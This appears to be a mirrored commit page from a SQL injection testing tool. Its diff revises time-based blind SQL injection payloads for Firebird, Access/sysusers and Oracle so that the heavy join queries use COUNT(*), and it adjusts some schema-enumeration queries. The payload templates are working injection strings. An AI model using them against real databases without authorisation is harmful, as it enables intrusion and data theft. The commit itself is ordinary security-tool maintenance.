Thanks to visit codestin.com
Credit goes to github.com

Skip to content

Commit 094baad

Browse files
stamparmstamparm
committed
bug fix (in SELECT based heavy queries COUNT(*) should be used; otherwise multiple row error happens without proper delay)
1 parent ec5c08c commit 094baad

2 files changed

Lines changed: 15 additions & 15 deletions

File tree

xml/payloads.xml

Lines changed: 13 additions & 13 deletions
Original file line numberDiff line numberDiff line change
@@ -1413,7 +1413,7 @@ Formats:
14131413
<where>1</where>
14141414
<vector></vector>
14151415
<request>
1416-
<payload>; SELECT [RANDNUM] FROM RDB$DATABASE AS T1, RDB$FIELDS AS T2, RDB$FUNCTIONS AS T3, RDB$TYPES AS T4, RDB$FORMATS AS T5, RDB$COLLATIONS AS T6;</payload>
1416+
<payload>; SELECT COUNT(*) FROM RDB$FIELDS AS T1, RDB$TYPES AS T2, RDB$COLLATIONS AS T3;</payload>
14171417
<comment>--</comment>
14181418
</request>
14191419
<response>
@@ -1514,9 +1514,9 @@ Formats:
15141514
<risk>1</risk>
15151515
<clause>1,2,3</clause>
15161516
<where>1</where>
1517-
<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7) ELSE [RANDNUM] END)</vector>
1517+
<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7) ELSE [RANDNUM] END)</vector>
15181518
<request>
1519-
<payload>AND [RANDNUM]=(SELECT [RANDNUM] FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7)</payload>
1519+
<payload>AND [RANDNUM]=(SELECT COUNT(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7)</payload>
15201520
</request>
15211521
<response>
15221522
<time>[DELAYED]</time>
@@ -1552,9 +1552,9 @@ Formats:
15521552
<risk>1</risk>
15531553
<clause>1,2,3</clause>
15541554
<where>1</where>
1555-
<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM all_users t1, all_users t2, all_users t3, all_users t4, all_users t5) ELSE [RANDNUM] END)</vector>
1555+
<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM all_users t1, all_users t2, all_users t3, all_users t4, all_users t5) ELSE [RANDNUM] END)</vector>
15561556
<request>
1557-
<payload>AND [RANDNUM]=(SELECT [RANDNUM] FROM all_users t1, all_users t2, all_users t3, all_users t4, all_users t5)</payload>
1557+
<payload>AND [RANDNUM]=(SELECT COUNT(*) FROM all_users t1, all_users t2, all_users t3, all_users t4, all_users t5)</payload>
15581558
</request>
15591559
<response>
15601560
<time>[DELAYED]</time>
@@ -1591,9 +1591,9 @@ Formats:
15911591
<risk>1</risk>
15921592
<clause>1</clause>
15931593
<where>1</where>
1594-
<vector>AND [RANDNUM]=IIF(([INFERENCE]),(SELECT [RANDNUM] FROM RDB$DATABASE AS T1, RDB$FIELDS AS T2, RDB$FUNCTIONS AS T3, RDB$TYPES AS T4, RDB$FORMATS AS T5, RDB$COLLATIONS AS T6),[RANDNUM])</vector>
1594+
<vector>AND [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1, RDB$TYPES AS T2, RDB$COLLATIONS AS T3),[RANDNUM])</vector>
15951595
<request>
1596-
<payload>AND [RANDNUM]=(SELECT [RANDNUM] FROM RDB$DATABASE AS T1, RDB$FIELDS AS T2, RDB$FUNCTIONS AS T3, RDB$TYPES AS T4, RDB$FORMATS AS T5, RDB$COLLATIONS AS T6)</payload>
1596+
<payload>AND [RANDNUM]=(SELECT COUNT(*) FROM RDB$FIELDS AS T1, RDB$TYPES AS T2, RDB$COLLATIONS AS T3)</payload>
15971597
</request>
15981598
<response>
15991599
<time>[DELAYED]</time>
@@ -1693,9 +1693,9 @@ Formats:
16931693
<risk>3</risk>
16941694
<clause>1,2,3</clause>
16951695
<where>2</where>
1696-
<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7) ELSE [RANDNUM] END)</vector>
1696+
<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7) ELSE [RANDNUM] END)</vector>
16971697
<request>
1698-
<payload>OR [RANDNUM]=(SELECT [RANDNUM] FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7)</payload>
1698+
<payload>OR [RANDNUM]=(SELECT COUNT(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7)</payload>
16991699
</request>
17001700
<response>
17011701
<time>[DELAYED]</time>
@@ -1731,9 +1731,9 @@ Formats:
17311731
<risk>4</risk>
17321732
<clause>1,2,3</clause>
17331733
<where>2</where>
1734-
<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM all_users t1, all_users t2, all_users t3, all_users t4, all_users t5) ELSE [RANDNUM] END)</vector>
1734+
<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM all_users t1, all_users t2, all_users t3, all_users t4, all_users t5) ELSE [RANDNUM] END)</vector>
17351735
<request>
1736-
<payload>OR [RANDNUM]=(SELECT [RANDNUM] FROM all_users t1, all_users t2, all_users t3, all_users t4, all_users t5)</payload>
1736+
<payload>OR [RANDNUM]=(SELECT COUNT(*) FROM all_users t1, all_users t2, all_users t3, all_users t4, all_users t5)</payload>
17371737
</request>
17381738
<response>
17391739
<time>[DELAYED]</time>
@@ -1770,9 +1770,9 @@ Formats:
17701770
<risk>3</risk>
17711771
<clause>1</clause>
17721772
<where>2</where>
1773-
<vector>OR [RANDNUM]=IIF(([INFERENCE]),(SELECT [RANDNUM] FROM RDB$DATABASE AS T1, RDB$FIELDS AS T2, RDB$FUNCTIONS AS T3, RDB$TYPES AS T4, RDB$FORMATS AS T5, RDB$COLLATIONS AS T6),[RANDNUM])</vector>
1773+
<vector>OR [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1, RDB$TYPES AS T2, RDB$COLLATIONS AS T3),[RANDNUM])</vector>
17741774
<request>
1775-
<payload>OR [RANDNUM]=(SELECT [RANDNUM] FROM RDB$DATABASE AS T1, RDB$FIELDS AS T2, RDB$FUNCTIONS AS T3, RDB$TYPES AS T4, RDB$FORMATS AS T5, RDB$COLLATIONS AS T6)</payload>
1775+
<payload>OR [RANDNUM]=(SELECT COUNT(*) FROM RDB$FIELDS AS T1, RDB$TYPES AS T2, RDB$COLLATIONS AS T3)</payload>
17761776
</request>
17771777
<response>
17781778
<time>[DELAYED]</time>

xml/queries.xml

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -437,8 +437,8 @@
437437
<blind query="SELECT MIN(username) FROM domain.users WHERE username > '%s'" count="SELECT CHR(COUNT(*)) FROM domain.users"/>
438438
</users>
439439
<columns>
440-
<inband query="SELECT columnname, datatype, len FROM DOMAIN.COLUMNS WHERE tablename = '%s' AND schemaname=user ORDER BY pos"/>
441-
<blind query="SELECT columnname FROM DOMAIN.COLUMNS WHERE tablename = '%s' AND schemaname=user ORDER BY pos" query2="SELECT datatype FROM DOMAIN.COLUMNS WHERE tablename = '%s' AND schemaname=user ORDER BY pos"/>
440+
<inband query="SELECT columnname, datatype, len FROM domain.columns WHERE tablename = '%s' AND schemaname=user ORDER BY pos"/>
441+
<blind query="SELECT columnname FROM domain.columns WHERE tablename = '%s' AND schemaname=user ORDER BY pos" query2="SELECT datatype FROM domain.columns WHERE tablename = '%s' AND schemaname=user ORDER BY pos"/>
442442
</columns>
443443
<tables>
444444
<inband query="SELECT tablename FROM domain.tables WHERE schemaname='%s' AND type='TABLE'"/>

0 commit comments

Comments
 (0)